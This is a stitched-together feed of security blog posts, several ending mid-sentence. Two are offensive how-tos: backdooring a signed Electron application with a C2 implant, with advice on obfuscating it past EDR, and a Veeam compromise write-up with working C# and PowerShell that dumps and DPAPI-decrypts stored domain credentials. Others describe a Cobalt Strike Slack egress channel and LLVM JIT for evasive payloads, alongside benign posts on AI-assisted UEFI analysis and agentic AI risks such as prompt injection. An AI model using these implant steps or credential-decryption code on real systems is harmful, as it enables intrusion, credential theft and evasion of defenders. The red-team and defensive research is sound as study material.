Backdooring Electron Applications
In increasingly restrictive corporate environments, deploying and maintaining C2 implants on Windows systems presents unique challenges. Signed execution policies, strict network controls, advanced segmentation, and continuous software behavior monitoring severely limit traditional loading and communication techniques. This blog explores how to adapt implant development and operational strategies to survive under these conditions. It covers topics such as executing under signature requirements, covert communication within networks under deep inspection, and approaches to maintaining persistence without violating environmental constraints. Imagine you gain access to a Windows environment configured in a highly restrictive way, which prevents you from loading unsigned implants by enforcing Windows Defender Application Control (WDAC) policies. What would you do in that case? If PowerShell is not blocked, you can execute your scripts, keeping in mind that AMSI will analyze them and determine whether the code is malicious or not. If all else fails, we can use an alternative called Loki C2. It’s a C2 that backcodes applications built with Electron. But what exactly is an Electron application? You’re probably familiar with applications like Teams, Notion, or Discord. Well, they’re built in Node.js using a framework called Electron (basically HTML, CSS, and JavaScript). Using this C2 server is very simple, you just need to download the server (.exe) and configure it using an Azure account, as communication will take place through a Blob. Firstly, the client binary will require two parameters: the SAS Token and the Blob URL. This will generates a folder with the implant’s contents, ready for use. I personally recommend obfuscating the implant’s contents using any JavaScript obfuscator you know to avoid IOCs. It also generates the Meta Container parameter, which we then copy entirely to the server: With everything configured, we must choose whether we want to back-store an existing application (e.g., Teams) or download a new application already implanted. In this case, we opted for the second option. Research has been conducted and discovered that the Mailspring application is vulnerable to this technique. Therefore, the application was downloaded, and the contents of the resources/app folder were deleted. That content was replaced by our implant which will be pasted inside resources/app. Now all that remains is to download the application onto the victim’s device and establish the connection. As shown in the image, the connection has been successfully established on a computer with MDE installed. Final Considerations This technique can be very powerful in some environments because it uses a signed application and communication is established through an Azure domain, which allows execution and connection in very restrictive environments. Various tests have been conducted with most of the top EDRs, and in many of them, the implant works even without obfuscation. Others report certain alerts that can be avoided by obfuscating the implant. Another important point is the option of backloading an application like Teams instead of downloading a new one. Be careful, if this isn’t done precisely, the application can become corrupted and stop working. One more thing that has worked for me is modifying the C2 code and recompiling it, altering the order of the functions and commenting out some that are not needed.
UEFI Vulnerability Analysis Using AI Part 3: Scaling Understanding, Not Just Context
In the prior two blogs within this UEFI Vulnerability Analysis using AI series, I described my research on analyzing enormous codebases, starting with UEFI firmware. The first two articles dealt with extending the open-source Large Language Model (LLM) token context window (effectively, what the LLM can hold in memory all at one time). In this article, the use of Knowledge Graphs to improve AI reasoning powers is investigated on the NVIDIA DGX Spark. In Part 1, I used the ChatGPT frontier model to analyze the OpenSSL module within an older version of the open-source Tianocore EDKII UEFI build. ChatGPT did a very good job of detecting the vulnerabilities in this older (August 2021) release. But it chokes on doing anything much larger than the OpenSSL module, which is a tiny fraction of the total UEFI image—due mostly to token context window and file upload size limits. You can see the challenge visually below: Caption: Relative size of the OpenSSL module to the entire UEFI codebase In Part 2, subtitled Breaking the Token Barrier, I described my first attempts to use a private LLM on my DGX Spark to analyze larger portions of the UEFI source code base for vulnerabilities. Here, I discovered obstacles: So, in this article, I’ve taken a “side-trip” to address the limitations of RAG and improve the inference reasoning power of my models. I’ll do this by using Knowledge Graph (KG) technology. So, you may ask, what is KG technology, and why use it as opposed to plain old text vector databases? That’s a very good question. Standard text databases treat data as rows and columns (in as many dimensions as is needed), whereas KGs organize facts into a network of interconnected entities, and are built using “triples”, which are: Viewing data in KG form addresses subtle “blind spots” found in LLMs: specifically, grounding facts and reducing hallucinations, and adding insight through meaningful relationships. Vector databases only know if two pieces of text are mathematically close to each other in a vector space; whereas KGs allow for deterministic logic, knowing how Node A relates to Node B (i.e., the CEO of “X” is located in “Y”). Confusing? A picture is worth a thousand words, so let’s begin with the end in mind. Below is a short video that captures a simple KG implementation: Caption: Video of Knowledge Graph for SourcePoint User Guide As a trial run, I decided to apply KG to ASSET InterTech’s SourcePoint JTAG-based debugger’s User Guide. This document, much like the Intel SDM, contains specialized information that does not appear to be “baked in” to any generally available LLM currently on the web. Applying superior reasoning powers to the esoteric data within these documents will aid in the accuracy and quality of the large codebase analysis. On the DGX Spark, NVIDIA provides a convenient set of Playbooks that help engineers explore and learn about many AI technologies that make up the NVIDIA stack. One of the playbooks is entitled Text to Knowledge Graph (named txt2kg hereinafter). Here’s the overview: Caption: Text to Knowledge Graph Playbook Instructions Author’s Note: You might miss it, but the overview section has in the fine print, “Future Enhancements: Vector embeddings and GraphRAG capabilities are planned enhancements.” So, we’ll need to wait a bit until all of the power of Knowledge Graphs for inference can be demonstrated. A set of instructions is provided, and they look fairly simple: Caption: Instructions for txt2kg And NVIDIA has a couple of videos that demonstrate the use of the txt2kg: Turn Text Into a Knowledge Graph with 70B LLM on DGX Spark I’m not a big fan of this one, although it’s short (about two minutes long), so you might as well watch it. It purports to demonstrate txt2kg on a 70B LLM (llama3.1:70b-instruct-q4_K_M) but there’s so much it doesn’t show, or “blurs” out to obfuscate what might be going on under the hood. DGX Spark Live: Process Text for GraphRAG With Up to 120B LLM This is worth a watch as well, and it’s longer (about 40 minutes). The only frustrating thing about it is that it purports to run on a 120B LLM (gpt-oss:120b), which is pretty large for the Spark, so we’ll see. There’s also a couple of useful articles to read in the NVIDIA Forums that proved invaluable: Unfortunately, there’s a lot more that needs to be done beyond what’s covered in the above, and there are many pitfalls; I’ll describe some of my own experiences below, in the hope to save readers some time. But first, it was necessary to divide up the SourcePoint User Guide into many separate constituent markdown (.md) files. txt2kg isn’t designed to swallow one monolithic PDF (in this case, 700+ pages worth, and 4MB in size). And it works with text (.md, .csv, .txt, and .json) only; a lot of the images that are in the SourcePoint User Guide can’t be consumed, and just clog up the works if you attempt to go further. As it turns out, these images aren’t really needed to put together a good KG for this document. So, first, we’ll use the Docling application (readers may remember my first attempt to use this in Part 2 of this series, Breaking the Token Barrier), to change the PDF to a single markdown file. As a separate note: from the Part 2 blog in this series, I found that the Intel SDM was not structured well for easy processing. The tables, in particular, don’t lend themselves to easy conversion to txt or md files. It’s a side project (Maybe hire an intern? Or use Copilot, Claude, etc.?) to put this into a form that Docling can easily convert without losing much of the value of the content. The specific Docling command to run on the SourcePoint PDF is: docling –to md SourcePoint.pdf –image-import-mode placeholder The “–image-import-mode placeholder” removes all images. And then, it’s necessary to chop up this monolithic markdown file into individual .md files for the separate sections within
The New Chapter of Egress Communication with Cobalt Strike User-Defined C2
Introduction For years, External C2 has been regarded as one of the most effective ways to bypass EDR and XDR solutions thanks to its ability to support custom-built egress channels. It allows red teams to design their own communication mechanisms, avoiding the static signatures that defenders traditionally monitor and detect. However, several limitations became apparent as External C2 matured: User-Defined C2: The New External C2 User-Defined C2 (UDC2) was introduced as the evolution of External C2, specifically designed to address many of these shortcomings. UDC2 is significantly lighter and only requires the development of a Beacon Object File (BOF) rather than a full standalone client. The new workflow can be summarized as follows: Beacon leverages the UDC2 BOF to transmit encrypted frames over the custom C2 channel implemented in the BOF. Using your C2 protocol, the BOF communicates frame data with the UDC2 server, which relays it to the UDC2 listener on your Cobalt Strike team server via a direct TCP link. The following image describes the architecture difference between User-Defined and External C2: As illustrated in the diagram, while from a development perspective the attacker infrastructure remains (almost) the same, the difference is in the client itself. Previously with External C2, the whole client must be developed. Meaning that the client will request the SMB beacon, inject it in the client itself and communicate with it through named pipe to relay the beacon task and later parse its output before sending it back to the Teamserver via the egress channel. With UDC2, only the BOF is required to develop, which will proxy the beacon functions, so its traffic gets redirected to the custom communication channel. Since the Beacon remains untouched, we can make use of Artifact Kit, Sleep Mask, UDRL and all the other evasion features Cobalt Strike offers. User-Defined C2: The Advantages With UDC2: However, the primary limitation is that development is constrained to C, since Beacon Object Files (BOFs) must be written in C. The additional BOF can also have evasive characteristics, particularly when leveraging APIs or libraries associated with commonly used services such as Slack, Microsoft platforms, AWS, Mattermost, Discord, etc. When aligned with legitimate tools and communication patterns already present in the target environment, the BOF’s traffic is more likely to blend in. However, extended or high-volume tasking – such as relaying large amounts of traffic – may generate abnormal spikes (for example, an unusually high rate of Slack messages per minute), which could appear suspicious to monitoring solutions or EDR platforms. Increasing Beacon sleep intervals can help reduce this visibility, though this approach may be less suitable for proxychains traffic, where speed is required to avoid connection timeout. Demo: Slack Egress Channel Since Fortra has open sourced a project demonstrating UDC2 via ICMP echo requests and replies, we decided to experiment with the new capability – this time using Slack instead. To achieve this, we set up a Slack workspace and created a bot with permissions to send and read messages. Our design uses two separate channels: one for client-to-server communication and another for server-to-client responses. This separation helps prevent any potential communication collisions. The initial development of the Slack transport began with a simple goal: leverage the WinInet API to perform HTTPS POST and GET requests against the Slack Web API. In the early “Proof of Concept” phase, the logic was simple—data was formatted using standard library functions like sprintf, and buffers were declared as fixed-size arrays on the stack (e.g., char response[8192]). While this worked in a standard executable environment, it was fundamentally incompatible with the constraints of a Beacon Object File (BOF). To solve this, we had to systematically “de-stack” the entire implementation. Every large buffer—the raw HTTP response, the extracted JSON value from Slack API, and the intermediate Base64 decoded binary—was migrated to the process heap. The official’s example has already implemented a safeHeapAlloc wrapper around Kernel32$HeapAlloc. Instead of: char resp[16384]; // Triggers __chkstkWe moved to: void* respPtr = NULL; safeHeapAlloc(&respPtr, 16384); // BOF compatible The same logic must be applied for data send logic. From the server-side, we created the following Python3 code to read and send data via Slack API: The final result is a default Beacon sending data through Slack API and the third-party server relaying it to Cobalt Strike’s Team Server, resulting in a Slack egress client/server communication: Conclusion In summary, while External C2 paved the way for flexible and stealthy command-and-control customization, its architectural and operational shortcomings eventually limited its practicality. User-Defined C2 represents a more mature evolution, delivering lighter integration, improved OPSEC, and reduced development overhead by leveraging BOFs instead of standalone clients. Although it does introduce constraints, most notably its dependency on C, it offers a far more streamlined and maintainable approach to building custom egress channels, ultimately empowering red teams with a cleaner, safer, and more scalable alternative. All codes and scripts referenced throughout this post, as well as the final project are available on our GitHub repository. References
UEFI Vulnerability Analysis using AI Part 2: Breaking the Token Barrier
In my Part 1 article on this topic, I used the ChatGPT frontier model to perform something that was previously unthinkable: an accurate machine analysis of OpenSSL vulnerabilities in the open-source EDKII build for an Intel CPU. This article documents the research to extend the LLM context memory beyond that of just the OpenSSL code: in fact, to analyze the entire UEFI firmware codebase simultaneously. Imagine the subtle bugs and vulnerabilities that might be found, if the entire UEFI codebase could be kept in memory and inferenced at one time. An LLM’s context window is the ultimate determinant of how much memory a given session holds: that is, how much can the model keep “in memory” before it starts to forget earlier context. Think of it in terms of the human brain: theoretically, we can remember everything from the current moment back to early childhood. Things might get fuzzy the further back we go; but at least in principle, if we took for example a Calculus course in college, we can probably do some simple derivatives even today in our head. More complex derivatives might take a few moments of self-study, but we’d be up to speed quickly. This is an analogy at best, and I’m probably mixing my AI “training” and “inference” metaphors a little to make the point. But machines work similarly to the human brain: in some respects, the LLM context window represents an LLM’s memory of the information that has been fed to it, up to a point. This is ultimately dependent on the amount, in classical AI implementations, of the amount of VRAM that is available to the GPUs involved in the inference stage. But it is possible to work around that, as we’ll see. In the earlier article, UEFI Vulnerability Analysis Using AI: Part 1, I did some basic analysis using ChatGPT of the CryptoPkg module within the Tianocore EDKII source tree, and it performed admirably. And when questioned, ChatGPT admitted: My current context window is about 128k tokens (roughly 400–500 pages of text). That’s the maximum amount of text I can keep “in working memory” at once when analyzing a file or conversation. Given the above constraint, and the fact that the CryptoPkg module itself is 65MB in size, with 18,668 files/folders therein, it’s a given that ChatGPT was doing some magic behind the scenes, or worse, silently disposing of earlier tokens and “forgetting” them as part of the analysis. This was not what I wanted. The goal is a transparent, clear use of an “open-source” downloadable LLM on my DGX Spark that I could tune specifically for the purposes of vulnerability detection in a huge codebase, striving for as much accuracy as possible; recognizing that there would be tradeoffs between reasoning power (LLM parameters), codebase size (token context window), system performance, and other factors. So continued the journey to develop this solution, make as many mistakes as I could, trip over as many obstacles as possible, and fall into as many pits as I could find. Such is the fast-track hands-on way of becoming an AI developer! On the DGX Spark, front-and-center in the Getting Started section that pops up when you first boot up the system is the Playbook for using the Open WebUI application with Ollama: It was extremely easy to set up, and I’ve had a lot of experience with Ollama, so I decided to start this way – only to regret it, as you’ll see shortly. But first, it was necessary to choose an Ollama model that would be well-suited to this purpose, with a large context window, and that would run comfortably on the DGX Spark. After some research, here’s a summary of what I found a few weeks ago: Here’s the top LLM for local large-codebase analysis (with tags, params, context, disk size, quant, and rough VRAM needs). 1️⃣ DeepSeek-R1-Distill-Llama-70B Why #1: best open-weight reasoning model right now, with 128K context and strong performance on code + general logic. Great for “understand this whole subsystem + design” type work. Ollama tag (typical): deepseek-r1:70b → currently deepseek-r1:70b-llama-distill-q4_K_M under the hood Ollama+2Ollama+2 Parameters: ~70.6B Context window: 128K tokens (Ollama tag lists 128K context window) Ollama Quantization (Ollama default): Q4_K_M (there’s also a q8_0 tag at ~75GB if you want higher fidelity) Ollama Size on disk (Ollama q4_K_M): ~43GB Ollama+1 VRAM you should plan for (quantized): For smooth use at 32K–64K context with everything on GPU: ~48–60GB With offloading (some layers on CPU/host RAM): workable on 24–32GB, but slower. Best use: Cross-file reasoning, understanding protocols/architectures, finding subtle bugs, mixing code + docs + logs. You can always let R1 “think aloud” then truncate the chain-of-thought if you don’t need verbosity. Sounds easy, right? Well, it wasn’t. In the interest of time, I won’t belabor all I went through, but I found that Retrieval-Augmented Generation (RAG) did not work reliably with Open WebUI, among other things. And the simplistic interface did not seem to have all the bells and whistles I would need to truly fine-tune a local LLM to do codebase analysis. So, after punting on Open WebUI, after some research, I decided to move to LM Studio – this promised to be a low-code way of achieving the goal. If you haven’t any experience with LM Studio yet, I’d highly recommend watching the YouTube video Correctly Install LM Studio on Linux Ubuntu and Host LLMs Using GUI, it will definitely save you time. Here’s a short list of things you need to do on the Spark to set it up: Download the .AppImage installation file from www.lmstudio.ai/download?os=linux. At the time of this writing, it’s LM-Studio-0.3.33-1-arm64.AppImage. Create an LMStudio folder in your home directory. Copy the .AppImage file from the Downloads folder into the LMStudio folder. Open a Terminal session, and navigate to the LMStudio folder with cd ~/LMStudio. Type chmod u+x LM-Studio-0.3.33-1-arm64.AppImage. Navigate to the newly created squashfs-root folder: cd squashfs-root Type in: sudo chown root:root chrome-sandbox sudo chmod 4755 chrome-sandbox Now you can directly invoke ./lmstudio
Just-in-Time for Runtime Interpretation – Unmasking the World of LLVM IR Based JIT Execution
Introduction to LLVM and LLVM IR In the evolving landscape of offensive security research, traditional code execution techniques face increasing scrutiny from modern detection systems. As a result, both offensive and defensive researchers are being pushed toward execution models that don’t look like traditional malware. LLVM Intermediate Representation (IR) presents such an opportunity. It is a file format that serves well for offensive code execution while remaining relatively under explored in security analysis workflows. LLVM is not just a compiler in the traditional sense, but a full modular framework that can be used to build compilers, optimizers, interpreters, and JIT engines. At its core, LLVM provides a well defined intermediate representation (LLVM IR) similar to MSIL in .NET, which acts as a universal language between the source language frontend and the machine specific backend. When you compile a C or C++ program with Clang, or a Rust program with rustc, you’re often producing LLVM IR first before it gets linked by the LLVM backend into actual machine code. This design makes LLVM both language and platform agnostic, which is a property that makes the IR file format such a fascinating playground for security research. LLVM JIT (Just-In-Time) execution holds good potential for code execution in red team tradecraft. The cross language and platform nature of LLVM IR, combined with its ability to be obfuscated and executed through multiple JIT engines, makes it an attractive option for evasive payloads. Understanding how to trace and analyze JIT execution, from IR loading through compilation, linking, and execution, is crucial for both LLVM enthusiasts and defensive research. The techniques outlined in this post provide a foundation for analyzing LLVM JIT execution at each stage and strategies to recover, debug, disassemble and perform IR analysis along with possible detection strategies. The LLVM Compilation Pipeline A traditional compilation pipeline takes source code, turns it into LLVM IR, optionally runs optimizations, and then produces an object file that the linker combines into an executable. With LLVM IR, we’re not tied to a single platform or CPU. This is because LLVM is built in a very modular way. The frontend’s job is just to translate source code into LLVM IR, while separate backends know how to turn that IR into machine code for different targets. Since these pieces are independent, the same IR can be reused for many architectures such as x86, ARM, RISC-V, GPUs, and more without altering the original source code. This separation is what makes things like cross compilation, JIT compilation, and support for new hardware much easier. If you’re curious to dive deeper, you can read more about LLVM’s overall architecture in the official LLVM documentation: https://llvm.org/ At a high level, LLVM compiles a source file to an executable using the following process: The cross platform capability makes IR a lightweight file format that serves well for staging execution. The IR file format is also not commonly seen in typical security analysis, making it an attractive option for lightweight evasive payloads. Stealthy interpretation can be achieved using multiple JIT execution engines (ORC, MCJIT, and custom interpreters), each offering different characteristics and detection profiles. The advantages of OLLVM obfuscation support on IR extend to both static and dynamic detection evasion. Even more interestingly, IR produced from entirely different languages like C, Rust, and Nim and can all be fed into the same LLVM JIT engine and executed seamlessly, provided they use the same LLVM version. This realization raises an intriguing question, what if LLVM IR itself became a vehicle for cross platform code execution? With JIT runtimes, you could generate code once, obfuscate it, and then run it anywhere. That’s the core idea behind the IRvana project. Overview of JIT Engines Unlike a traditional static linker that produces a fixed COFF/PE binary ahead of time, LLVM’s JIT engines compile and link code inside the running process itself. With static linking, all symbols, relocations, and code layout decisions are finalized before execution and then handled by the OS loader. JIT engines like MCJIT and ORC replace that entire model with an in process compiler and linker, generating executable machine code on demand and mapping it directly into memory. This allows code to be compiled lazily, modified or replaced at runtime, and optimized using real execution context, rather than assumptions made at build time. The result is a far more flexible execution model where code is transient, dynamic, and tightly coupled to runtime behavior, in contrast to the fixed and observable structure of a statically linked COFF binary. MCJIT: The Legacy Engine MCJIT (Machine Code Just-In-Time Execution Engine) is the older and simpler of the two JIT engines. It works by eagerly compiling entire modules into machine code once they’re added to the engine. After calling finalizeObject(), you get back native code pointers that can be invoked directly. The downside is that MCJIT doesn’t provide much modularity. You can’t easily unload or recompile just one function without recompiling the whole module. Internally, MCJIT uses a RuntimeDyld wrapper for dynamic linking and memory management, specifically through an RTDyldMemoryManager. The EngineBuilder initiates the creation of an MCJIT instance, which then interacts with these components to manage the compilation and execution pipeline. For detailed information on MCJIT’s design and implementation, see: https://llvm.org/docs/MCJITDesignAndImplementation.html ORC: The Modern JIT Architecture ORC (On-Request Compilation), by contrast, is the modern JIT architecture in LLVM. ORC is designed around layers that give you fine-grain control over the execution pipeline. For example, an IRTransformLayer lets you inject custom passes, whether optimizations or obfuscations, more efficiently before code is lowered. A CompileLayer takes IR and turns it into object code, which is then handled by the ObjectLayer that manages memory mappings. All of this is orchestrated through an ExecutionSession. Unlike MCJIT, ORC supports true lazy compilation. Functions are only compiled when they’re called for the first time. This makes it more efficient and, for our purposes, more interesting to trace and analyze. The JITDylib class, a fundamental component in ORC, is thread safe and reference counted, inheriting
Securing Agentic AI Systems
Overview Agentic AI development is undergoing a rapid uptake as organizations seek methods to incorporate generative AI models into application workflows. In this blog, we will look at the components of an agentic AI system, some related security risks, and how to start threat modeling. Agentic AI means that the application has agents performing autonomous actions in the application workflow. These autonomous actions are intrinsic to the normal functioning of the application. Writing an application that uses an AI model via an API call—to supplement its operation but without any autonomous aspect—is not considered agentic. You can think of the agents in an agentic AI application to be analogous to a simulated human that’s performing some specific goal or objective. The agents in the system will be configured to access tools and external data, often via a protocol, such as Model Context Protocol (MCP). An agent will use the information advertised about an external tool to decide whether the tool is optimal for achieving that agent’s specific goal or objectives. Agents will act as task specialists with a specific role—to solve a specific part of the workflow. Having autonomy means that the agent will not necessarily follow the same workflow each time during operation. In fact, if an application developer/architect is looking for a deterministic (and thus, more algorithmic, execution), then an agentic AI based implementation is not a good choice. In the diagram below, the Open Web Application Security Project (OWASP) shows us a reference architecture for a single-agent system. This helps to give us a better sense of the autonomous aspects of an agentic AI implementation. The actual agent components in the continuous agentic-execution loop include: You can see in this simplified view how the agent will have access to external services via the agentic tools, and that components also include some form of short-term memory and vector storage. The concept of using a vector storage database is important because it is central to how Retrieval Augmented Generation (RAG) works, with large language model (LLM) responses augmented by RAG at inference time. Communications to an agentic AI-based application are likely going to be using some form of JSON/REST API to the agent from, say, a web frontend or to an orchestrator agent, in the case of multi-agent systems. LLM Interactions Are Like Gambling LLMs are non-deterministic by nature. We can easily observe this phenomenon by using a chat model and supplying the same prompt multiple times to a chat session. You will discover that you do not get the same results each time, even with the most carefully crafted and explicit prompts and instructions. Further complicating the non-deterministic challenge is how easy it is to attack LLMs using social engineering. Although guardrails are typically in place in both model training and at model use (inference), with some creativity, it is not difficult to evade guardrails and convince the LLM to generate results that reveal sensitive data or generate inappropriate content. A typical prompt for an LLM is broken into two components: one is the “system prompt” and the other is the “user prompt.” As with all LLM prompting, the system prompt is typically used to set a role and persona for the model and is prepended to any user-prompt activity. A known security risk can occur, whereby a developer thinks that the system prompt is a secure place to store data (for example, credentials or API keys). Using social engineering tactics, it is not difficult to get an LLM to reveal the contents of the system prompt. Most LLM usage is very much like speaking with a naïve child or an inexperienced intern. You must be very explicit in your instructions, and the digitally simulated reasoning from the generative pretrained transformer (GPT) architecture might still get things wrong. This means that creating the prompting aspects of any agentic AI implementation is going to be a time-consuming, iterative process to achieve a working result that will never truly be 100% accurate. Autonomous Gambling with Agents In an agentic AI application, there are potentially many agents that are interacting with LLMs that yield a multiplicative effect surrounding non-determinism. This means that building an application testing plan for such a system becomes very difficult. Further amplifying this challenge is the adoption of MCP servers to perform tasks—tasks that might be third-party, remote services not under the authorship of the organization developing the application. MCP is a proposed standard for agentic tool communications using JSON RPC 2.0 introduced by Anthropic in November of 2024. An MCP server has different embedded components that include: MCP servers can run as local endpoint entities, remote (over network) entities in a server, or hosted services. Unfortunately, the MCP proposed was entirely focused on functionality with little regard to security risks. Potential security concerns include: The Cloud Security Alliance (CSA) has sponsored the authoring of a Top 10 MCP Client and MCP Server Risks document, which is now maintained by the Model Context Protocol Security Working Group. Risk Title Description Impact MCP-01 Prompt Injection Malicious prompts manipulate server behavior (via user input, data sources, or tool descriptions) Unauthorized actions, data exfiltration, privilege escalation MCP-02 Confused Deputy Server acts on behalf of the wrong user or with incorrect permissions Unauthorized access, data breaches, system compromise MCP-03 Tool Poisoning Malicious tools masquerade as legitimate ones or include malicious descriptions Malicious code execution, data theft, system compromise MCP-04 Credential & Token Exposure Improper handling or storage of API keys, OAuth tokens, or credentials Account takeover, unauthorized API access, data breaches MCP-05 Insecure Server Configuration Weak defaults, exposed endpoints, or inadequate authentication Unauthorized access, data exposure, system compromise MCP-06 Supply Chain Attacks Compromised servers or malicious dependencies in the MCP ecosystem Widespread compromise, data theft, service disruption MCP-07 Excessive Permissions &Scope Creep Servers request unnecessary or escalating privilege Increased attack surface, greater damage if compromised MCP-08 Data Exfiltration Unauthorized access or transmission of sensitive data via MCP channels Data breaches, regulatory non-compliance, privacy violation MCP-09 Context Spoofing &Manipulation Manipulation or
From Veeam to Domain Admin: Real-World Red Team Compromise Path
In many enterprise environments, backup infrastructure is treated as a “supporting system” rather than a high-value security asset. But during real red team engagements, backup servers often expose some of the most powerful credentials in the entire domain. This post walks through a real-world compromise path that started with Veeam and ended with full Domain Admin, highlighting why backup security matters and how defenders can harden their environments. Initial Access: Landing on the Veeam Server During a red team engagement, one of the first systems we compromised internally was the Veeam Backup & Replication server by exploiting AD misconfiguration. This host usually holds: Once on the server, our next focus was understanding how Veeam stores and protects sensitive information. Writing a Custom Plugin to Decrypt Stored Credentials We wrote a custom dot net plugin that works with our custom C2 that’s capable of decrypting the stored passwords in PostgreSQL DB. The decryption has three main steps: Retrieving the EncryptionSalt from the Registry public static string GetVeeamData() { string keyPath = @”SOFTWARE\Veeam\Veeam Backup and Replication\Data”; using (RegistryKey baseKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64)) using (RegistryKey key = baseKey.OpenSubKey(keyPath)) { if (key == null) return “Key not found.”; StringBuilder sb = new StringBuilder(); foreach (string valueName in key.GetValueNames()) { object value = key.GetValue(valueName); sb.AppendLine($”{valueName} : {value}”); } return sb.ToString(); } } public static string printhello(string name) { string output = GetVeeamData(); return output; } This code snippet is used to extract Veeam Backup & Replication configuration data directly from the Windows Registry. Veeam stores several internal values under the registry path: SOFTWARE\Veeam\Veeam Backup and Replication\Data How the function works: Result: Extracting the Encrypted Credentials from the Database Now it’s time to extract the encrypted password from the PostgreSQL database. The execute command refers to our custom C2 plugin, which allows us to run external programs with specific arguments and return their output for further processing. execute C:/Program Files/PostgreSQL/15/bin/psql.exe -d VeeamBackup -U postgres -c “SELECT user_name,password FROM credentials” The result of the above command: Decrypting the Passwords Using the Retrieved Salt and the Windows DPAPI Mechanism public static string DecryptVeeamPasswordPowerhshell(string context, string saltBase) { using (var ps = PowerShell.Create()) { string script = @” param($context, $saltbase) Add-Type -AssemblyName System.Security $salt = [System.Convert]::FromBase64String($saltbase) $data = [System.Convert]::FromBase64String($context) $hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($data.Length * 2) foreach ($byte in $data) { $hex.AppendFormat(‘{0:x2}’, $byte) > $null } $hex = $hex.ToString().Substring(74,$hex.Length-74) $data = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2) for ($i = 0; $i -lt $hex.Length; $i += 2) { $data[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16) } $securedPassword = [System.Convert]::ToBase64String($data) $data = [System.Convert]::FromBase64String($securedPassword) $local = [System.Security.Cryptography.DataProtectionScope]::LocalMachine $raw = [System.Security.Cryptography.ProtectedData]::Unprotect($data, $salt, $local) [System.Text.Encoding]::UTF8.GetString($raw) “; ps.AddScript(script).AddParameter(“context”, context).AddParameter(“saltbase”, saltBase).AddCommand(“Out-String”); var results = ps.Invoke(); if (ps.HadErrors) throw new Exception(string.Join(“\n”, ps.Streams.Error.Select(e => e.ToString()))); return string.Join(“”, results.Select(r => r.ToString())); } } This function demonstrates how Veeam-encrypted credentials can be programmatically decrypted by combining a C# wrapper with an embedded PowerShell script. Veeam relies on Windows DPAPI (LocalMachine scope) along with a registry-stored salt to protect stored passwords. Once you obtain the encrypted blob and the encryption salt, this function reconstructs the plaintext password. How the function works: 1. Embedding a PowerShell Script Inside C#: The method DecryptVeeamPasswordPowerhshell creates a PowerShell instance inside C#. This allows us to execute a PowerShell script directly and receive its output as a string. 2. Preparing the Input: Two values are passed to the script: context → the encrypted DPAPI blob from the Veeam DB saltBase → the Base64-encoded encryption salt retrieved from the registry Both are Base64-decoded to obtain the raw byte arrays. 3. Extracting the DPAPI Payload: Veeam wraps the actual DPAPI-protected password in a larger structure. The script: 4. Base64 Re-encoding and Decoding: Veeam stores the DPAPI data in another Base64 layer. The script re-encodes the cleaned payload, then decodes it again to normalize it. 5. DPAPI Decryption: The script calls: [System.Security.Cryptography.ProtectedData]::Unprotect( $data, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine ) This uses the machine’s DPAPI keys and the Veeam salt to decrypt the password. 6. Returning the Plaintext: The decrypted byte array is converted to UTF-8 text and returned to the C# function, which passes it back as a normal string. Result: One of the Domain Admin credentials was stored directly in the Veeam database, alongside privileged vSphere access. With just these two credentials, the entire environment became fully exposed, providing unrestricted visibility and control across all systems. Recommendations This compromise path made one thing clear: backup systems are not just supporting infrastructure, they are high-value targets that can decide the fate of the entire domain. A single exposed credential inside Veeam, combined with broad vSphere access, created a direct route to full enterprise takeover. By enforcing strict credential hygiene, reducing privilege levels, and hardening the backup environment is a must for organizations. Securing backups is securing the business.
UEFI Vulnerability Analysis Using AI: Part 1
UEFI vulnerabilities are “the next frontier” in attack vectors, as boot firmware can be persistent on any given target, and runtime services will persist even after an operating system is loaded. And in this new era of very powerful generative pre-trained transformers (GPTs), AI analysis tools are emerging to detect and mitigate such vulnerabilities as never before. In this article, I explore the use of these tools on Tianocore EDKII UEFI builds. Over time, malware and threats have “gone down the stack”, as privileges increase the closer you get to the silicon. This can be depicted visually by the following: Caption: Diagram courtesy of Pavel Yosifovich, Windows Internals course The closer you get to the hardware and silicon (CPU), the more dangerous any vulnerability or threat will be; offset by the fact that attacks at these levels are very difficult to craft. As an example, for silicon, vulnerabilities or trojans could in theory be present, but extremely low-level knowledge, physical access and/or access to the semiconductor fab supply chain would be necessary to take advantage of them. But firmware, and in this particular instance UEFI, makes for an interesting case study. The UEFI supply chain is relatively fragile; for Intel CPUs, the major suppliers (AMI, Insyde, Phoenix) base their code on the Tianocore EDKII open-source distribution, which in isolation is somewhat flawed; some notebook/server/embedded system OEMs/ODMs make (sometimes random) changes to the base to add their own features; and distribution of security updates is haphazard. Companies like Binarly and Eclypsium do a brisk business in hardening enterprise firmware supply chains. Given that, I’ve done some research to explore the following: And I’ll present the findings in a form that others can follow along if interested. So, with that, let’s proceed. OVERALL APPROACH In terms of an overall approach, I wanted to start with an established baseline: a known UEFI build, with source and symbols, and with known vulnerabilities. This is difficult, as most commercial products have their firmware locked down, resident in flash memory, and accessible only as binaries. Fortunately, for the purpose of this study, a publicly available board that meets my criteria does exist: the AAEON UP Xtreme Whiskey Lake board: Caption: AAEON UP Xtreme Whiskey Lake board In terms of analysis tools, I plan to compare and contrast the results from: ChatGPT 5.1 Gemini 3.0 My DGX Spark with model llama3.1:70b My NVIDIA DGX Spark with model deepseek-r1 But first, let’s compare and contrast older code with known defects to a “golden” baseline of modern firmware: in this case, the CryptoPkg part of the UEFI build. We’ll build an older version of the code that uses OpenSSL 1.1.1j (with known defects); and then compare it against the current version, that incorporates OpenSSL 3.5.1. BUILDING THE UEFI DEBUG IMAGE WITH SOURCE/SYMBOLS The UP Xtreme board has a documented, working implementation of what’s termed “MinPlatform” for it within the Tianocore framework. That is, a fully working, mostly open-source, build tree that is available online for anyone to download and play with. I say “mostly” open source because it uses the Intel Firmware Support Package (FSP), and there are binary blobs therein. But that’s OK: the blogs are mostly for silicon initialization, and a small part of the overall build files. Intel (mostly Harry Hsiung and Laurie Jalstrom, to the best of my knowledge; and my apologies in advance for anyone I neglected to mention) did a terrific job of providing step-by-step instructions on building a bootable UEFI image on this target, based on an older release. The general instructions on how to build the UEFI image are in text form here: https://github.com/tianocore-training/PlatformBuildLab_MinPlatform_FW/blob/master/FW/MinPlatformBuild/UpX_Lab/Lab_Guide.md A PowerPoint/PDF with some more detail on building the image is here: 